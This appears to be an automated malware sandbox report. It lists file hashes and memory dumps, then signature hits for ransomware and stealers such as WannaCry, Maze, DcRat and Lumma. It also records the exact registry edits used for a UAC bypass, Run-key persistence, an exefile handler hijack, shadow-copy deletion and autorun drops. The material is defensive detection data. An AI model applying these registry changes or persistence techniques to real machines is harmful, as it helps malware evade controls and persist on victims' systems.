memory/5868-1941-0x0000000071380000-0x0000000071931000-memory.dmp
memory/5868-1949-0x0000000000B70000-0x0000000000B80000-memory.dmp
memory/4460-1907-0x00007FFB6BBD0000-0x00007FFB6BDC5000-memory.dmp
memory/5696-1860-0x00000000005B0000-0x000000000060E000-memory.dmp
memory/5772-1826-0x0000000001060000-0x000000000106C000-memory.dmp
memory/2696-1770-0x0000000000400000-0x000000000068E000-memory.dmp
memory/4460-1674-0x00007FFB2BC50000-0x00007FFB2BC60000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-KCIOL.tmp\x2s443bc.cs1.tmp.exe
| MD5 | 47f1b831df716d95c10ff34107c5f503 |
| SHA1 | 697065c04e4fdcd35328d0cdf1d45d47133024f1 |
| SHA256 | 1bfdc14b971709405c1e22342fc651c22e356d447ac59eb4ca56f11527cb7f11 |
| SHA512 | a2696935de76f2f7f69757b38d06fafa2491942da9b9b087c0099880942135a5ced710cd7a876fcc72820d6b5cec33be277246bd883e266e4b80493cd1caf3a3 |
memory/3692-1590-0x0000000000400000-0x00000000004D8000-memory.dmp
memory/4460-1547-0x00007FFB2BC50000-0x00007FFB2BC60000-memory.dmp
memory/3040-1544-0x0000000000400000-0x00000000005DE000-memory.dmp
memory/4460-1510-0x00007FFB2BC50000-0x00007FFB2BC60000-memory.dmp
memory/3028-1974-0x0000000000400000-0x000000000041B000-memory.dmp
memory/5564-1977-0x0000000071380000-0x0000000071931000-memory.dmp
memory/3040-1976-0x0000000000400000-0x00000000005DE000-memory.dmp
memory/5772-1982-0x00007FFB4B930000-0x00007FFB4C3F1000-memory.dmp
memory/5424-1983-0x00007FFB4B930000-0x00007FFB4C3F1000-memory.dmp
memory/1056-1984-0x0000000000FC0000-0x0000000000FD0000-memory.dmp
memory/1056-1981-0x0000000071380000-0x0000000071931000-memory.dmp
memory/2388-1985-0x0000000071380000-0x0000000071931000-memory.dmp
memory/2388-1986-0x0000000000C30000-0x0000000000C40000-memory.dmp
C:\ProgramData\system.exe
| MD5 | e817d74d13c658890ff3a4c01ab44c62 |
| SHA1 | bf0b97392e7d56eee0b63dc65efff4db883cb0c7 |
| SHA256 | 2945881f15e98a18d27108a29963988190853838f34faf3020e6c3c97342672d |
| SHA512 | 8d90ef308c1e0b7e01e7732e2cd819f07bfc1ef06e523efa81694ced75550c9f1be460fc9de412faeb96273a6492580402ab9c9538ed441fc26d96b6785e7815 |
memory/5424-1991-0x0000000001670000-0x0000000001680000-memory.dmp
memory/2696-1992-0x0000000000B00000-0x0000000000B01000-memory.dmp
memory/4436-599-0x0000000000400000-0x000000000043D000-memory.dmp
memory/4436-579-0x0000000000400000-0x000000000043D000-memory.dmp
C:\Users\Admin\AppData\Local\Tempspwak.exe
| MD5 | d459ac27cda1076af5b93ba8a573b992 |
| SHA1 | 429406da9817debfbadd91dc7aecb9a682d8d9da |
| SHA256 | c458b39ee9dacfece49933e4ceaaeab376448d8d56eb503ea519a8df8323bccb |
| SHA512 | 3f4569a5a21564b6c54df889f58022c88c6c71d415ad9f9203ead1ed518a8886d2c31a0cd7980fa47874dc5ad12c4e2b9c6946d8d643f06583c2f4c77c20500a |
C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe
| MD5 | 07b6b5a25d10c3796000cc5729b3d642 |
| SHA1 | 55addcd6fcedf76fadb74523a8fafcb52de00c07 |
| SHA256 | 579a4c330d5c7b002545437f75d80bbc64550ce36aa01384eaba9e968ba5cf77 |
| SHA512 | 765578b6c50e62968eb6bd11e7b46df5f7ec78db18d367e01b650558562cc37a85ea5840f8789ae96efac0701bd21e6a30c090914192d9527a58330eb87953ef |
memory/3564-1995-0x00000000026D0000-0x00000000026D1000-memory.dmp
memory/1056-1999-0x0000000000FC0000-0x0000000000FD0000-memory.dmp
memory/5340-2004-0x0000000000400000-0x000000000041B000-memory.dmp
C:\odt\DECRYPT-FILES.txt
| MD5 | 4bb2ba2f84baa09606e54e4a257ca077 |
| SHA1 | 4d40eec72befb1269fd176d1f8cbed2012e8d923 |
| SHA256 | 30ebc741b8369e2b5940ce0d6b1c02914ea415fac41496e4d3a01de014ba7e17 |
| SHA512 | 7493226016c36374f22da01a4c66b4af78769b8fb59c0c9167e900e1963dd1dd4ed68ff97e00609bfe396bc90545e587f5ecdc9483fe49dc61704eddf223206f |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\_R_E_A_D___T_H_I_S___JY8JPEXE_.hta
| MD5 | 2c9191c735bf5e25befd8119cd27e822 |
| SHA1 | b644e89887265f276f4cd59b7520925c701f24ef |
| SHA256 | aeee74d0978524e231ab789d0e76e2ed959ffae0bdb6f54ba6020cb0e8c1e389 |
| SHA512 | 5737230d1e4d0328935176f2002c709d249385c75ae6b6dcf760a1bfabed769493d5b9f5cf9ab2f3e8ee10d2aba2734abb2eb1fa734a4436351b5d565360b4c3 |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\_R_E_A_D___T_H_I_S___J1YHL18_.txt
| MD5 | d63f235215ba1d55adda7029a9b6cef0 |
| SHA1 | a36498f7535d791439b924de97e2c8dd1e5826c8 |
| SHA256 | 8b3dfe208c8a29efcaabd2a8628bde990151b89829e800b82a1ba2b47c6ee212 |
| SHA512 | 6f62b9fa3f932d6e1e6b9fe0cd1ea88a77a6861845fc0d5441fe6431a3b1bbe4b5d088a8d5e2b609c94110ec03c41d47e637b76420d4a1edd265f005d398cab9 |
memory/5424-3029-0x00007FFB4B930000-0x00007FFB4C3F1000-memory.dmp
memory/3244-3404-0x0000000000400000-0x0000000000458000-memory.dmp
memory/3244-3411-0x0000000000400000-0x0000000000458000-memory.dmp
C:\Users\Default\Desktop\@[email protected]
| MD5 | 94dc98f6cf04a5a1cee3fc8c208881ed |
| SHA1 | 0e50e37e962a9abcf2ed30f12734cf7d6a0925b5 |
| SHA256 | 424f00a8883f0b653c203198bb364566c4b8d307093113f81bfc8a8dfe35018b |
| SHA512 | d587e4be65a7b38c1c7fe8fc40bbce6368b7c1e82282db96fe2ed4ff09a281132237102ba4c0e6ccdcd5eec7382aa425073f5745bc5798286d170368634ef14f |
memory/6012-3439-0x00007FFB4B6E0000-0x00007FFB4C1A1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe
| MD5 | 72657c0b91667ff91411bd5368ec67bf |
| SHA1 | 3d5ba99ff10ff47acb4e1adc8375c696393a80d2 |
| SHA256 | 7dda30378a4b802ea476d8b8242c3125ed1c2dcee0745866fc7af521abe59b1f |
| SHA512 | 09554a24ed572da97401936ccdd6a662454b3ce8feaa821127d2953d66abc97bcd4c050d27bedda41d2437f3085d97425e3b91baec26dfe1ad90680145e39497 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svchost.exe
| MD5 | d63c259f30cd4da0e1d0d7b548f57e5a |
| SHA1 | dbc47dccd3c2f9b3fa32d000b011d4ed39db9373 |
| SHA256 | 541bb12ce71802410f47eb486d75a66fcdcfd82ed58a8e744e73b1a250077758 |
| SHA512 | 896f30be09b19d07109f72842ace34fada2d4b349c9097139c3421e9abe755a8215f2ddc974ddf42ac8e86c0395f9a492e639b2e89d39581d27650aad3737b74 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe
| MD5 | f05c694a114f51a3ef0db7f93f777711 |
| SHA1 | ac5e548ed226ee56cc643a8c2f4eb2ce5877f8dc |
| SHA256 | 0af0b4bffa67145e4e5ecd2321bb7790e9c14ed802a7984798fc7c00b6763207 |
| SHA512 | 8a72c139562723cbd19b4e74c711714f8e85c18a3de365d7cf936c4ef69506d881db8c3851a477de90eaaa4a82cc96eac25929e4b012452e18841dd8c372ab4b |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n0smbvh5.sje.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\directx.sys
| MD5 | bc007d29b77c5d40fee9c741117fd01c |
| SHA1 | bf1dd68ea903f8ae1e6f6af1a6547dace19cf458 |
| SHA256 | 927135d920363fc7b46999cc534603f87081e0f5e0d4cabca317457f1d809d06 |
| SHA512 | 900c4c4d7d73b5ef0f18ba2010177789f77e62ff342cf77bd3aa7c086dc52cf2f5da44391b26afb9cebd830c50932dcc7ac87243e9813a2f71de59cdc1a32cfb |
C:\Windows\directx.sys
| MD5 | 08fa7453a25f3a52779a7aa8fb5212b9 |
| SHA1 | 1fc456299905503062286e3745da761f633c03f6 |
| SHA256 | be881e64fa5f2e2ef533f914a44603f2436a87af2fefbed48f78edd78ae7cb9c |
| SHA512 | fc61677cce474511a84806968b65614aee3034e8522c1376f6aa3100da204a7ffb41c1a6e467a5ef556339590ee69e9ae23edd579f754a5f9538652cc77f6b80 |
C:\Windows\SysWOW64\setting.ini
| MD5 | 4899724bd6d4f00dd736debaa4f9fe4f |
| SHA1 | 24ccbc4bd9148a2b862920c9bbdbfaad35ffdb51 |
| SHA256 | 415a201301b99b1b9cfeb69520d0b3b6b6caa25959901d008fabf9d8ce957540 |
| SHA512 | 78a9809ba0e03bfc0d53ccdfd0fa1eaf9d507956fb7378605c80207666b1b5ec3f9ccb90bb7ca4d28ad0c1ba4ba3548c032e98240da6754ccbec9c49f3a8f3ef |
C:\Windows\directx.sys
| MD5 | 38e49808f35a33de0bcf226babe3bcd9 |
| SHA1 | a9e46a9cd2c2ddd39d78efe9069bc2cdc33caaae |
| SHA256 | 80878b915291940b97fc067a52a0914db6be22fa33e535297d014ac482fec4a1 |
| SHA512 | bcd4d8304a933860229a21abda66f99b4c05e70c018875c7f913ce61e873e5b5ba3447c723ff79f957400ce0e33ab0f4b95e515518f072f07bcb35fbcb3e54ba |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe
| MD5 | 59504f549a4851aaae5cf436f09acf97 |
| SHA1 | 87074c018ce0fc7150757dbe477dbc488d098279 |
| SHA256 | e618f977366d917e05358c693002d785938f019a1c69fbd2997e3943b186ef60 |
| SHA512 | f7542ffe2d4937a0ae4a5cc3aa3ae58b2ddabc3d282ad2168eb42fab4ebd8a8775ea0b86cf3c0b186fe3acdf43114bcca3113b72c28606a6b7341ca2fd5bf1c2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_74E841258D264E0EACAC62677F65C3EA.dat
| MD5 | 4c9d2511765153060ee5250b08268e43 |
| SHA1 | 0d03807bc7c15cfd6edd5e32b2f61b9002469a50 |
| SHA256 | 88cb9825dc8910fe6f2696040c78b1d8218ae444843596baf1f12d8c09639b14 |
| SHA512 | bd8b3f6733b212da4fbfdf665c6a876241e5d772e69b5d33cfa42b8b5c660087bababe8a5582431a30287c599993253e554885238857521603caaf73b41867fd |
C:\Windows\directx.sys
| MD5 | 9c23d307e726201708a9b064f7bdfb85 |
| SHA1 | 5a093a4754dce36f416c41942773ee62cca248ac |
| SHA256 | e015c2d92c0091bed5d818244c893b18f5d9294ea5d9438c6d0f63927f7f6b18 |
| SHA512 | ef55953501ea0ab4989a21f63441d94c3b0982c3e4336de7b7168a5963a3e50d93891e0d07a1767fdcd0b759048915960aa2da4855a04cfa4e83cebe53650d0e |
C:\Users\Admin\AppData\Local\Temp\Qvswppeorgu.tmp
| MD5 | 90a1d4b55edf36fa8b4cc6974ed7d4c4 |
| SHA1 | aba1b8d0e05421e7df5982899f626211c3c4b5c1 |
| SHA256 | 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c |
| SHA512 | ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2 |
C:\Users\Admin\AppData\Local\Temp\Njbshple.tmp
| MD5 | 9618e15b04a4ddb39ed6c496575f6f95 |
| SHA1 | 1c28f8750e5555776b3c80b187c5d15a443a7412 |
| SHA256 | a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab |
| SHA512 | f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-01-09 22:08
Reported
2024-01-09 22:30
Platform
win11-20231222-en
Max time kernel
581s
Max time network
589s
Command Line
Signatures
DcRat
Detect Neshta payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
HawkEye
Lumma Stealer
Maze
Neshta
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
Ramnit
Troldesh, Shade, Encoder.858
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Java\jdk-1.8\include\bot.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files\Java\jdk-1.8\include\bot.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files\Java\jdk-1.8\include\bot.exe | N/A |
Wannacry
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Deletes shadow copies
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\drivers\en-US\wfplwfs.sys.mui.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\en-US.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\gm.dls.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\en-US.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\UMDF\en-US.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\en-US\ndiscap.sys.mui.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\UMDF.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\UMDF.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\en-US\ndiscap.sys.mui.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\afunix.sys.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\afunix.sys.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\gm.dls.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\en-US\NdisImPlatform.sys.mui.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\afunix.sys.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\gm.dls.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\gmreadme.txt.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\UMDF.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\en-US\ndiscap.sys.mui.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\en-US\wfplwfs.sys.mui.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\UMDF\en-US.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\UMDF\en-US.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\en-US\NdisImPlatform.sys.mui.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\gmreadme.txt.Cyborg Builder Ransomware.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\en-US\wfplwfs.sys.mui.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\en-US.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\gmreadme.txt.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\en-US\NdisImPlatform.sys.mui.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD7DB3.tmp | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\6ce70cc8365b721.tmp | C:\Windows\SysWOW64\netsh.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe | C:\PROGRA~3\system.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_R_E_A_D___T_H_I_S___BWR0F_.hta.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD7D9C.tmp | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt | C:\Windows\SysWOW64\netsh.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\word\startup\decrypt-files.txt | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | \??\c:\users\admin\appdata\roaming\microsoft\word\startup\_R_E_A_D___T_H_I_S___6NWUK75_.txt | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_R_E_A_D___T_H_I_S___6NWUK75_.txt.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6ce70cc8365b721.tmp | C:\Windows\SysWOW64\netsh.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DECRYPT-FILES.txt | C:\Windows\SysWOW64\netsh.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\UqHLX7zx6p.8834.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe | C:\PROGRA~3\system.exe | N/A |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | \??\c:\users\admin\appdata\roaming\microsoft\word\startup\_R_E_A_D___T_H_I_S___BWR0F_.hta | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-I5IQQ.tmp\tuc2.tmp | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 91.211.247.248 | N/A | N/A |
Uses the VBS compiler for execution
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bot = "\"C:\\Program Files\\Java\\jdk-1.8\\include\\bot.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\ProgramData\\Microsoft OneDrive\\setup\\System.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bot = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\00000000\\bot.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\System32\\DesktopShellAppStateContract\\dllhost.exe\"" | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" | C:\Users\Admin\Desktop\7.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." | C:\PROGRA~3\system.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\802f813d3810aa536753efbd3390b541 = "\"C:\\ProgramData\\system.exe\" .." | C:\PROGRA~3\system.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\lldluhdhlxabv396 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\tasksche.exe\"" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4286256601-2211319207-2237621277-1000\Software\Microsoft\Windows\CurrentVersion\Run\ Ransomware = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3582-490\\bot.exe" | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\6.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Desktop\6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files\Java\jdk-1.8\include\bot.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files\Java\jdk-1.8\include\bot.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | C:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| File opened for modification | C:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| File created | F:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
| File opened for modification | F:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-Package~31bf3856ad364e35~amd64~en-US~10.0.22000.1.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Holographic-Desktop-Analog-Package~31bf3856ad364e35~amd64~~10.0.22000.318.cat.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netathr10x.inf_amd64_2691c4f95b80eb3b\eeprom_qca9377_1p1_NFA425_olpc_A_BC_CBXA0.bin.Cyborg Builder Ransomware | C:\Windows\SysWOW64\wscript.exe | N/A |
